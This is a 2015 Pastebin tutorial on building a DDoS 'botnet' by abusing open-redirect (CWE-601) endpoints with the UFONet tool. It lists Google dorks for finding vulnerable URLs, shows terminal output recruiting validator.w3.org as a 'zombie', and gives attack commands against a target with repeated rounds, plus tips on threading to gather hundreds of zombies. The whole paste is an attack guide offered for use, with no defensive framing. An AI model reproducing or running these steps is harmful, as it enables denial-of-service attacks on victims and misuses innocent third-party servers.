PH1K3

CWE-601 building a quick botnet from the terminal

May 2nd, 2015
983
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. This time i am going to xploit the CWE-601 and use it to make the targets my slave/zombie and building a small botnet
  2. using python curl and google dorks:)
  3.  
  4. the vulnerabilty im goin to sploit is:
  5. CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
  6. more info: http://cwe.mitre.org/data/definitions/601.html
  7. https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
  8.  
  9. i searched around and found out that epsylon have created a tool for this and put it on his github.
  10. So open your terminal and type: cd Desktop && mkdir ufonet && cd ufonet && wget clone https://github.com/epsylon/ufonet.git
  11.  
  12. then cd in to that dir and when u launch it (./ufonet) you are first goin to wanna find your zombies so you can take
  13. down your target.
  14. dorks: 'proxy.php?url='
  15. 'check.cgi?url='
  16. 'checklink?uri='
  17. 'validator?uri='
  18.  
  19. lets search: ./ufonet -s 'checklink?uri=' 30
  20.  
  21. :~/Desktop/programs/ufonet/ufonet/ufonet# ./ufonet -s 'checklink?uri=' 30
  22. ===========================================================================
  23.  
  24. 888 888 8888888888 .d88888b. 888b 888 888
  25. 888 888 888 d88PY888b 8888b 888 888
  26. 888 888 888 888 888 88888b 888 888
  27. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  28. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  29. 888 888 888 888 888 888 Y88888 88888888 888
  30. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  31. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  32.  
  33. UFONet - DDoS attacks via Web Abuse - by psy
  34.  
  35. ===========================================================================
  36.  
  37. Searching for 'zombies' on google results. Good Luck ;-)
  38.  
  39. ======================
  40.  
  41. +Victim found: http://validator.w3.org/checklink?uri=
  42. ------------
  43.  
  44. ======================
  45. +Possible Zombies: 1
  46. ======================
  47.  
  48. Wanna check if they are valid zombies? (Y/n)
  49. Y
  50. Are 'they' alive? :-) (HEAD Check):
  51. ===================================
  52. Trying: 1
  53. ---------------------
  54. Zombie: validator.w3.org
  55. Status: Ok [200]
  56. ----------
  57. ==================
  58. OK: 1 Fail: 0
  59. ==================
  60. ======================
  61. Checking for payloads:
  62. ======================
  63. Trying: 1
  64. ---------------------
  65. Vector: http://validator.w3.org/checklink?uri=
  66. Status: Waiting your orders...
  67. ----------
  68. ==================
  69. OK: 1 Fail: 0
  70. ==================
  71. ==================
  72. Army of 'zombies'
  73. ==================
  74. ------------------
  75. Total Army: 1
  76. ------------------
  77. Wanna update your army (Y/n)Y
  78. -------------------------
  79.  
  80. [INFO] - Botnet updated! ;-)
  81.  
  82. and yeah u use these dorks to find as many vic as u can .
  83. u can also use this command to search for 30 pages instead of 30 dorks, its like a more verbose mode
  84. ./ufonet -s 'proxy.php?url=' --sn 30
  85. but u can allways change 30 to what u want , U could rewrite the program and add threads to make it alot faster=more zombies
  86.  
  87. the attack:
  88. first u have to inspect your target : ./ufonet -i http://target.com
  89. then try to attack that : ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  90.  
  91. then lets use all your zombies against the target :./ufonet -a http://target.com -r 30
  92. 30= rounds to attack
  93.  
  94.  
  95. i got 10 zombies by using 3 dorks and 20 tries each .if u thread it up and use like 100-200 threads im sure u could get a couple of maybe 300 and up
  96.  
  97. Cya next time
  98.  
  99. !\_________________________/!\
  100. !! !! \
  101. !! Your security is 404 !! \
  102. !! !! !
  103. !! u have been !! !
  104. !! !! !
  105. !! Hacked !! !
  106. !! !! !
  107. !! Sincerly PH1K3 !! /
  108. !!_________________________!! /
  109. !/_________________________\!/
  110. __\_________________/__/!_
  111. !_______________________!/
  112. ________________________
  113. /oooo oooo oooo oooo /!
  114. /ooooooooooooooooooooooo/ /
  115. /ooooooooooooooooooooooo/ /
  116. /C=_____________________/_/
RAW Paste Data